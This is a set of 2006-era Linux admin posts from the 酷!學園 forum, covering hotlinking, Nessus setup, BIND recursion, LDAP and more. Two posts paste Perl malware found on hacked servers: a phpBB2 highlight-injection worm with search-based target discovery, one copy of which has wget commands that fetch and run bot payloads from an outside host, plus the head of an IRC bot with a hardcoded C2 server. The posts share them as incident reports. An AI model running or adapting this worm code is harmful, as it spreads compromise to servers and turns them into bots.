酷!學園

各位前輩，
第一次看到這種處理程序，ps aux 裡面一直有這樣的東西出現：

root     18331  0.0  0.3 10092 3688 ?        S    19:17   0:00 sendmail: server [59.89.246.158] cmd read

請問一下這樣正常嗎？我該怎麼禁止呢？謝謝！！

36.7G HUS151436VLF200 (光纖界面)  SCSI硬碟機    9,450  
36.7GB,2Gbits/sec Fibre Channel光纖介面,15000rpm,3.3ms,16Mb,單碟29G,液態軸承馬達,Ultrastar 15K147系列,五年保固  

這是名人3C量販看到的，

請問這種硬碟是要搭配特殊的硬碟櫃還有特殊的網卡才能用是嗎？？
如果家用PC想用的話，可以用嗎？？
SATA有出10000rpm以上的硬碟嗎？？

最近用SATA 7200 RPM   250Gb的硬碟在做影片輸出，
才發現原來速度慢得給它有點可憐～～

請問一下，

Global VPN Client一般都會搭配自製憑證使用嗎？

就是說，需不需要為自己公司建立一個獨立的憑證供GVC使用？
然後，當公司內部使用者要申請VPN帳號時，Client連同憑證
一起配發給使用者？

還是說，用 local 使用者認證就好了？

那麼～可以整合Windows AD Server嗎？

可不可以麻煩使用過SonicWall的前輩，建議一下「一般的作法」呢？

謝謝！

想請問一下，

前陣子小弟貼過了一篇關於Web Server被盜連的問題，
雖然使用了rewrite engine，結果還是沒有成效，現在改用
mod_security了，結果有這樣的紀錄：


access_log
70.35.23.196 - - [27/May/2006:19:11:14 +0800] "GET /somewhere/c/somepict.JPG HTTP/1.1" 200 73498 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=2348777" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6"

error_log
70.35.23.196 - - [27/May/2006:19:11:14 +0800] "GET /somewhere/c/somepict.JPG HTTP/1.1" 200 73498 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=2348777" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6"

modsec_audit.log
Request: www.example.com.tw 70.35.23.196 - - [27/May/2006:19:11:16 +0800] "GET /somewhere/c/somepict.JPG HTTP/1.1" 200 73498 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendid=2348777" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/312.8 (KHTML, like Gecko) Safari/312.6" - "-"

依照http status code看來，200    那不就表示其實這個存取的動作，
還是成功了呢？

這是我的mod_security的設定：
SecFilterSelective HTTP_Referer|ARGS "\.myspace\.com"

請問我應該怎麼做才能有效防止這個盜連呢？  profile.myspace.com

謝謝！

原來都是利用phpBB2的漏洞跑進來的，各位的phpBB2版本如果是下面程式碼裡面列出的話，就趕快升級囉。

（第一行還要註明他的e-mail，真是夠了。）

phpBB2 2.0.20 升級頁面：
http://phpbb-tw.net/phpbb/viewtopic.php?t=43968

後來雖然我還是決定暫時先把phpBB2移除了，但是可否請學長們教一下，咱們的酷學園是如何做好安全防護的呢？



###### psyclon.br@gmail.com ######

use strict;
use IO::Socket;
use IO::Handle;


my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $s= (int(rand(281)));
    if ($rnd>1000) { $s= (int(rand(100)))}
 
   

    my @str=(
             "by+phpBB+2.0.4+",
"by+phpBB+2.0.5+",
"by+phpBB+2.0.6+",
"by+phpBB+2.0.7+",
"by+phpBB+2.0.8+",
"by+phpBB+2.0.9+",
"by+phpBB+2.0.10+",
         


 );

    my $query="search.msn.com.br/results.aspx?q=";
    $query.=$str[(rand(scalar(@str)))].$rnd;
    $query.="&first=$s";

    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/msn|cache|hotmail/){
            push (@lst,$1);
        }
    }
   
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
        my @r = <$sock>;
        $page="@r";
        alarm 0;
        close($sock);
    };    
    return $page;

}

eval {fork and exit;};

my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;






while(time<$oneday){
    @urls=fetch();
    foreach $url (@urls) {
        if ($url !~ /viewtopic.php/) {next;}
        $url =~ s/(.*\/viewtopic.php\?[t|p]=[0-9]+).*/$1/;
        my $cmd=encode("perl -e \"print q(jSVowMsd)\"");
        $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
        $page = http_query($url);
        if ( $page =~ /jSVowMsd/ ){
            $url =~ s/&highlight.*//;
            my $upload=$url;
            $upload =~ s/viewtopic.*//;
            $cmd=encode("$cmd");    # set cmd
            $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
            $page = http_query($url);
            $cmd=encode("$cmd");    # set cmd
            $url =~ s/&highlight.*//;
            $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
            $page = http_query($url);
        }

    }
}

最近發現我維護的一個網站一直有這樣的存取訊息，而且非常頻繁：

66.91.56.7 - - [17/May/2006:15:27:38 +0800] "GET /poster/i-l/longestyard.JPG HTTP/1.1" 200 40073 "http://profile.myspace.com/index.cfm?fuseaction=user.viewprofile&friendID=15047703" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
不同的來源IP，但後面REFER的網址都差不多，
請問這是在幹嘛呢？看起來不像是真的在瀏覽我的網頁耶～

如果要針對REFER的內容作限制的話，我應該要怎麼作呢？ 謝謝！

Fedora Core 3
Apache 2.0.53

最近用NESSUS掃描，有一個問題一直搞不懂，我依照文件的建議
設定好acl了，但是卻搞得我的HTTP Virtual Server出問題，
不知道有沒有人針對這個弱點做過改善呢？

我的做法是，在named.conf最前面宣告：

acl my-nets {127.0.0.1/32; 59.xxx.xxx.0/24; };

然後在options裡面加一行：

allow-query { my-nets; };

這樣不妥嗎？

還是我在my-nets裡面的設定有問題呢？

Synopsis :

The remote name server allows recursive queries to be performed
by the host running nessusd.


Description :

It is possible to query the remote name server for third party names.

If this is your internal nameserver, then forget this warning.

If you are probing a remote nameserver, then it allows anyone
to use it to resolve third parties names (such as www.nessus.org).
This allows hackers to do cache poisoning attacks against this
nameserver.

If the host allows these recursive queries via UDP,
then the host can be used to 'bounce' Denial of Service attacks
against another network or system.

See also :

http://www.cert.org/advisories/CA-1997-22.html

Solution :

Restrict recursive queries to the hosts that should
use this nameserver (such as those of the LAN connected to it).

If you are using bind 8, you can do this by using the instruction
'allow-recursion' in the 'options' section of your named.conf

If you are using bind 9, you can define a grouping of internal addresses
using the 'acl' command

Then, within the options block, you can explicitly state:
'allow-recursion { hosts_defined_in_acl }'

For more info on Bind 9 administration (to include recursion), see:
http://www.nominum.com/content/documents/bind9arm.pdf

If you are using another name server, consult its documentation.

Risk factor :

Medium / CVSS Base Score : 4
(AV:R/AC:L/Au:NR/C:N/A:N/I:P/B:I)
CVE : CVE-1999-0024
BID : 136, 678
Nessus ID : 10539

換了工作之後就很少摸Linux了，
今天心血來潮想寫個支備份程式，卻意外發現主機被駭掉了，
這支程式大概有700多行，前幾行是這樣的：


#!/usr/bin/perl
my $processo = '/usr/local/sbin/httpd -DSSL';
my $linas_max='5';
my $sleep='5';
my @adms=("spart","hacked");
my @hostauth=("spart.gov","muie.gov");
my @canais=("#hor");
my $pwned="/tmp/horderd";
my $nick='FLaviu-';
my $ircname = 'spart';
chop (my $realname = 'uname -a');
$servidor='aiurea.sytes.net' unless $servidor;
my $porta='6667';

my $VERSAO = '0.2';

$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';

use IO::Socket;
use Socket;
use IO::Select;
chdir("/");
$servidor="$ARGV[0]" if $ARGV[0];
$0="$processo"."\0"x16;;
my $pid=fork;
exit if $pid;
die "Problema com o fork: $!" unless defined($pid);


還有一支，只能看，不能用。

我覺得很奇怪，到底要怎麼樣才可以像
這些駭客一樣辦到呢？

用現成的工具？
利用漏洞，怎麼個利用法？
就算每天修修補捕的，駭客好像想進來你的系統就，隨時可以進來似的。



#!/usr/bin/perl

use strict;
use IO::Socket;
use IO::Handle;

if (-e "/tmp/.eu1deiogringos") {exit;}

my $process = '/usr/sbin/httpd';
$0="$process"."\0"x16;;
my $pid=fork;


sub fetch();
sub remote($);
sub http_query($);
sub encode($);

sub fetch(){
    my $rnd=(int(rand(9999)));
    my $s= (int(rand(1000)));
    if ($rnd>1000) { $s= (int(rand(200)))}
 
   

    my @str=(
             "%22%3A%3A+View%22+%22+Topic%22+2.0.4+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.5+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.6+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.7+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.8+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.9+",
             "%22%3A%3A+View%22+%22+Topic%22+2.0.10+",



 );

    my $query="search.msn.com.br/results.aspx?q=";
    $query.=$str[(rand(scalar(@str)))].$rnd;
    $query.="&first=$s";

    my @lst=();
    my $page = http_query($query);
    while ($page =~  m/<a href=\"?http:\/\/([^>\"]+)\"?>/g){
        if ($1 !~ m/msn|cache|hotmail/){
            push (@lst,$1);
        }
    }
   
    return (@lst);
}

sub http_query($){
    my ($url) = @_;
    my $host=$url;
    my $query=$url;
    my $page="";
    $host =~ s/href=\"?http:\/\///;
    $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/;
    $query =~s/$host//;
    if ($query eq "") {$query="/";};
    eval {
        local $SIG{ALRM} = sub { die "1";};
        alarm 10;
        my $sock = IO::Socket::INET->new(PeerAddr=>"$host",PeerPort=>"80",Proto=>"tcp") or return;
        print $sock "GET $query HTTP/1.0\nHost: $host\nAccept: */*\nUser-Agent: Mozilla/4.0\n\n ";
        my @r = <$sock>;
        $page="@r";
        alarm 0;
        close($sock);
    };    
    return $page;

}

sub encode($) {
    my $s = shift;
    $s =~ s/(.)/"chr(".ord($1).")%252E"/seg;
    $s =~ s/%252E$//;
    return $s;
}



eval {fork and exit;};

my $iam=$ARGV[0];
my $oneday=time+3600;
my $page="";
my @urls;
my $url;

            $url =~ s/&highlight.*//;
            my $upload=$url;
            $upload =~ s/viewtopic.*//;
            $cmd="wget http://ddos.nikitosa.net.ru/myfiles/expl/linuxday.txt -O /tmp/.girl; wget http://ddos.nikitosa.net.ru/myfiles/expl/linuxdaybot.txt -O /tmp/.girl2; perl /tmp/.girl; perl /tmp/.girl2;";    # set cmd
            $cmd=encode("$cmd");    # set cmd
            $url .="&highlight=%2527%252Esystem(".$cmd.")%252E%2527";
            $page = http_query($url);
$cmd="wget
http://ddos.nikitosa.net.ru/myfiles/expl/linuxdaybot.txt -O /tmp/.girl2; perl
/tmp/.girl2; touch /tmp/.eu1deiogringos;";
            $page = http_query($url);
        }

    }
}


搞了半天，MailWatch的首頁沒有辦法顯示中文耶～

有沒有什麼技巧可以讓主旨或本文的部分出現中文呢？

謝謝！

比如說，我用outlook寄了一主旨為[測試]的信件，
mailwatch的資料庫會有這筆紀錄`：

Subject: =?big5?B?pKSk5bT6uNU=?=

可是在首頁的地方卻出現1而已，編碼的問題？或者可以用php的什麼函式
把主旨轉成中文呢？謝謝！

前言

最近很倒楣，兩三台客戶的主機莫名其妙被駭掉了，輕一點的是上層單位發信通告，
重一點的，還有網路刑事警察寄來的公文，當然，還聽過FBI發出的警告。

說實在的，系統帳號的密碼就算設得很複雜，防火牆規則看起來也挺嚴密的，駭客
總是有辦法侵入，高明的也就算了，因為實在太強了，但是如果變成人家練功的對象，
就會給它很肚爛了。

裝完nessus，不代表主機就不會被駭了，但至少，身為系統管理員，深度了解作業
系統的潛在問題，卻是刻不容緩的，不是嗎？

Nessus計畫已研發多年，集眾人之力提供各作業平台一個強而有利的弱點掃描引擎：

Nessus is the world's most popular open-source vulnerability scanner used
in over 75,000 organizations world-wide. Many of the world's largest
organizations are realizing significant cost savings by using Nessus to
audit business-critical enterprise devices and applications.

The "Nessus" Project was started by Renaud Deraison in 1998 to provide to
the internet community a free, powerful, up-to-date and easy to use remote
security scanner. Nessus is currently rated among the top products of its
type throughout the security industry and is endorsed by professional
information security organizations such as the SANS Institute. It is
estimated that the Nessus scanner is used by 75,000 organizations world-wide.

很多英文介紹，重點只有一個：趕快把它裝起來！

基本需要的檔案：

   nessus-libraries-x.x.tar.gz
   libnasl-x.x.tar.gz
   nessus-core.x.x.tar.gz
   nessus-plugins.x.x.tar.gz

以上檔案請自行到官方網站抓取：

   http://www.nessus.org/download/index.php

依序安裝，不然會有錯誤。

一、基本安裝步驟（文字模式下的掃描－不使用圖形介面的工具）

   1. nessus-libraries
   
      [root@www] ./configure --prefix=/usr
      [root@www] make && make install
   我是比較懶啦，把預設安裝目錄指定成--prefix=/usr，就可以省掉其他參數設定，所以，如果你只有輸入./configure，沒有指定prefix，目錄會變成/usr/local/lib，所以要改一下/etc/ld.so.conf，把/usr/local/lib加到最後一行，然後執行：

      [root@www] ldconfig
   
   
   2. libnasl
   
      [root@www] ./configure --prefix=/usr
      [root@www] make && make install
   
   如果用預設安裝，目錄會變成/usr/local/lib，因此加上這個參數設定：
   
   [root@www] export LD_LIBRARY_PATH=$LD_LIBRARY_PATH:/usr/local/lib)
如果想每次登入都會生效，就把這行加到.bash_profile裡面
   
   
   3. nessus-core
   
      [root@www] ./configure --prefix=/usr --disable-gtk
      [root@www] make && make install
   
   4. nessus-plugins
      [root@www] ./configure --prefix=/usr
      [root@www] make;make install
   
   這樣就全部裝好啦！


二、安裝之後的設定
   
   1. 首先新增一個nessus專用的憑證：
   
   [root@www ]# nessus-mkcert
   /usr/var/nessus/CA created
   /usr/com/nessus/CA created
   -------------------------------------------------------------------------------
                           Creation of the Nessus SSL Certificate
   -------------------------------------------------------------------------------
   
   This script will now ask you the relevant information to create the SSL
   certificate of Nessus. Note that this information will *NOT* be sent to
   anybody (everything stays local), but anyone with the ability to connect to your
   Nessus daemon will be able to retrieve this information.
   
   在這邊輸入相關資料
   CA certificate life time in days [1460]:---------------------預設
   Server certificate life time in days [365]:------------------預設
   Your country (two letter code) [FR]: TW----------------------隨你
   Your state or province name [none]: TAIWAN-------------------隨你
   Your location (e.g. town) [Paris]: TAICHUNG------------------隨你
   Your organization [Nessus Users United]: ROICAT--------------隨你
   
   
   輸入完畢，程式會恭喜你一下：
   -------------------------------------------------------------------------------
                           Creation of the Nessus SSL Certificate
   -------------------------------------------------------------------------------
   
   Congratulations. Your server certificate was properly created.
   
   /usr/etc/nessus/nessusd.conf updated
   
   The following files were created :
   
   . Certification authority :
      Certificate = /usr/com/nessus/CA/cacert.pem
      Private key = /usr/var/nessus/CA/cakey.pem
   
   . Nessus Server :
       Certificate = /usr/com/nessus/CA/servercert.pem
       Private key = /usr/var/nessus/CA/serverkey.pem
   
   Press [ENTER] to exit
   
   
   2. 再來新增一個可登入nessus的帳號：
   
   [root@www ]# nessus-adduser
   
   Addition of a new nessusd user
   ------------------------------
   
   Login : renaud -------------------------------帳號名稱
   Authentication (pass/cert) [pass] : pass------選擇使用密碼認證
   Password : secret-----------------------------，總共要輸入兩遍，別忘了～
   
   User rules
   ----------
   nessusd has a rules system which allows you to restrict the hosts
   that renaud2 has the right to test. For instance, you may want
   him to be able to scan his own host only.
   
   Please see the nessus-adduser ( 8 ) man page for the rules syntax
   
   Enter the rules for this user, and hit ctrl-D once you are done :
   (the user can have an empty rules set)
   這個時候可以輸入你要的限制規則，如果不想設定，只要按ctrl-D就行了。
   
   底下三行是範例：
   deny 10.163.156.1
   accept 10.163.156.0/24
   default deny
   
   Login            : renaud
   Password         : secret
   DN       :
   Rules            :
   
   deny 10.163.156.1
   accept 10.163.156.0/24
   default deny
   
   問你以上資料對不對，對的話，輸入y然後 [enter] 就好啦～
   
   Is that ok (y/n) ? [y] y
   
   這次就沒有恭喜你了：
   user added.
   
   3. 啟動nessus server
   很簡單，只要你安裝的時候都有指定/usr那個目錄的話，只要輸入：
   
   [root@www ]# nessusd -D
   
   啟動之後，檢查一下有沒有正常啟動：
   
   [root@www ]# netstat -ant | grep 1241
   
   有這行就表示你成功啟動nessus伺服器了：
   tcp   0  0 0.0.0.0:1241    0.0.0.0:*    LISTEN
你可以不要用這個port，參考一下說明檔，把port改到別的地方。
   
   4. 開刀啦！

                不要一開始就去掃描別人的主機，不然可能會被當作駭客。

   先建立一個文字檔，裡頭包含你要掃描的ip或ip範圍，如：
   
      建立一個檔案：
      /root/ip-list
      
      內容如下：
      127.0.0.1
      192.168.1.0/24
   
   然後呢，因為會跑很久，如果你用putty等軟體，建議你先執行一下
   
      [root@www ]# screen
   
   如果有版權宣告，按一下[ENTER]就會回到terminal底下，注意你的
   視窗左上角會變成：
   
      [screen 0: bash] root@www:~
   
   接著輸入：
   
      [root@www ]# nessus -q -V -T html_graph localhost 1241 tony \
            yourpassword ip-list nessus-report.html
      
   開始掃描之後，你就可以先離開啦：
   
      先按ctrl + a
      然後按一下 d
      
   正常的話，你就會回到原本的那個Terminal底下，如果不放心的話，輸入：
   
      [root@www ]# screen -ls
      There is a screen on:
              3308.pts-0.www  (Detached)
      1 Socket in /tmp/screens/S-root.
   
      
   想回去剛剛分離的Terminal，那就輸入：
   
      [root@www ]# screen -r
   
   5. 解讀nessus產生的報告：
   
   把掃描完的檔案拉回你的電腦，用瀏覽器打開，就可以清楚的看到弱點偵測的報告嚕～
   趕快依照裡面的建議，把系統的漏洞修補起來。
   

三、安裝圖形化支援的nessus

常用Linux作業系統的人，好像都不太愛裝x-window，其實，用nessus的圖形介面
也蠻方便的說，對於沒有windows的人來說，用不著裝一整套的XFree86，只是，
安裝過程給它很麻煩就是了。

1. 抓檔案：
wget ftp://rpmfind.net/linux/fedora/core/updates/1/i386/XFree86-libs-data-4.3.0-55.i386.rpm
wget ftp://rpmfind.net/linux/fedora/core/updates/1/i386/XFree86-libs-4.3.0-55.i386.rpm
wget ftp://rpmfind.net/linux/fedora/core/updates/1/i386/XFree86-devel-4.3.0-55.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/fontconfig-devel-2.2.3-5.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/freetype-devel-2.1.9-1.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/pango-devel-1.6.0-7.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/atk-devel-1.8.0-2.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/glib2-devel-2.4.7-1.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/glib2-2.4.7-1.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/gtk2-2.4.13-9.i386.rpm
wget http://ftp.isu.edu.tw/pub/Linux/Fedora/linux/core/3/i386/os/Fedora/RPMS/gtk2-devel-2.4.13-9.i386.rpm

上面是有順序性的，所以，如果你的系統當初安裝時就沒有這些套件的話，請依序安裝。
當然，你可以直接把wget改成rpm -Uvh，這樣就省了一個步驟，只是如果出現套件相依問題時，
就比較麻煩了。

XFree86的三個套件不是最新的，如果你的系統已經存在xwindow，請不要蓋掉你原本的套件，
試著反序安裝回去，比如說，先抓gtk2-devel-2.4.13-9.i386.rpm回來安裝，然後按照
RPM的指示，再去找相關的套件回來用。

例如：

[root@www nessus]# rpm -ivh gtk2-devel-2.4.13-9.i386.rpm
warning: gtk2-devel-2.4.13-9.i386.rpm: V3 DSA signature: NOKEY, key ID 4f2a6fd2
error: Failed dependencies:
        XFree86-devel is needed by gtk2-devel-2.4.13-9.i386
        atk-devel >= 1.6.0-1 is needed by gtk2-devel-2.4.13-9.i386
        glib2-devel >= 2.4.0-1 is needed by gtk2-devel-2.4.13-9.i386
        pango-devel >= 1.4.0-1 is needed by gtk2-devel-2.4.13-9.i386

那你就可以按照它顯示出來的套件全裝好，再裝gtk2-devel-2.4.13-9.i386

所有檔案，可以到http://rpmfind.org/找找看，或到義守大學http://ftp.isu.edu.tw/找。


2. 重新編譯一次nessus-core

   [root@www nessus]# ./configure --prefix=/usr --enable-gtk --with-x
   [root@www nessus]# make&&make install
   
3. 啟動nessus server

   [root@www nessus]# nessusd -D

4. 啟動用戶端：
   4-1 直接在x-windows下執行：
      
      開一個終端顯示，然後輸入：
      
         [root@www nessus]# nessus &
      
      正常的話，就會跳出一個登入的畫面，然後只要輸入正確帳號密碼，即可登入。
      
   4-2 把畫面丟到windows作業系統：
   
   你需要安裝xwin32，可以到這邊下載：
   
      http://www.starnet.com/
      
      註冊之後，你會收到一封下載通知，然後按照指示下載就好了，因為是試用版，
      所以每次只有30分鐘的使用時間，時間到了，就要重新啟動。
      安裝好之後，只要點兩下把它啟動就好了，不用特別設定。
      
   4-3 進入nessus server
   
   使用putty或相關的ssh軟體，telnet應該也可以吧？好久不用telnet了：
   
      [root@www nessus]# export DISPLAY=你的windows的IP:0.0
      如：
      [root@www nessus]# export DISPLAY=210.95.8.88:0.0
      
      接著，還是一樣，輸入：
      
      [root@www nessus]# nessus &
      
      等一下下，如果你是透過Internet的話，時間會比較久，然後，
      一樣的登入畫面就會出現啦～
      
四、結論

常常遇到莫名其妙的入侵事件，也不知道自己的作業系統夠不夠牢固，藉著nessus
就至少可以清楚的知道自己的主機有哪些尚未修補起來的漏洞，好比說，今天我才
知道，原來libtiff那個看起來不起眼的套件，竟然也暗藏殺機啊～

所以囉～沒事就跑跑nessus，檢查一下自己的主機，定時做更新，做好平常的防護，
把主機被駭客入侵的危險性降到最低。

預防重於重灌啊！

是這樣的，小弟想開一個共用目錄，然後在每個user的webdisk檔案夾，
建立一個連結，可是，好像只要超過了/home/~之後，連結就不能使用了說？

比如說，我在/底下開一個叫做share的檔案夾，然後在/home/fz150n
建立一個/share的連結，比如說：

# ln -s /share /home/fz150/webdisk/share

可是，當我登入openwebmail的webdisk之後，那個連結是看不到的？

這個功能能達成嗎？

我的環境是 raid-5 5+1 磁碟陣列，(Mylex DAC960)
在Linux底下，只見得到/dev/rd/c0d0 or /dev/rd/c0d0pX等等裝置，
這樣的情形，還可以用SMART作簡單的監控嗎？

我把Smartmontool5.3安裝在其他單純scsi hard drive的機器，
做了簡單的硬碟狀況回報，但是，這種/dev/rd/c0d0的裝置，
smartmontool就好像不支援了？

除了直接巡機房之外，
是否有可以監控磁碟陣列裡面每顆硬碟狀態的工具呢？

我找了好久，是否有人可以稍稍只點一下，哪裡可以找到這樣的工具呢？

謝謝！

這幾天買了書來學OPENLDAP，旗標出版的，我按照書上的指示，
全安裝好了，結果，除了root之外，竟然沒有辦法登入？
剛剛我把/etc/pam.d/system-auth裡面的幾行註解掉了，
結果就能照平常的帳號密碼登入FEDORA，所以，
可不可以請大家告訴小弟，該怎麼設定，才能在登入console
的時候，正常的配合OpenLDAP認證呢？
謝謝！
#%PAM-1.0
# This file is auto-generated.
# User changes will be destroyed the next time authconfig is run.
auth        required      /lib/security/$ISA/pam_env.so
auth        sufficient    /lib/security/$ISA/pam_unix.so likeauth nullok
#auth        sufficient    /lib/security/$ISA/pam_ldap.so use_first_pass
auth        required      /lib/security/$ISA/pam_deny.so

account     sufficient    /lib/security/$ISA/pam_succeed_if.so uid < 100
account     required      /lib/security/$ISA/pam_unix.so
#account     [default=bad success=ok user_know=ignore service_err=ignore system_err=ignore] /lib/security/$ISA/pam_ldap.so

password    requisite     /lib/security/$ISA/pam_cracklib.so retry=3
password    sufficient    /lib/security/$ISA/pam_unix.so nullok use_authtok md5 shadow
#password    sufficient    /lib/security/$ISA/pam_ldap.so use_authtok
password    required      /lib/security/$ISA/pam_deny.so

session     required      /lib/security/$ISA/pam_limits.so
session     required      /lib/security/$ISA/pam_unix.so
#session     optional      /lib/security/$ISA/pam_ldap.so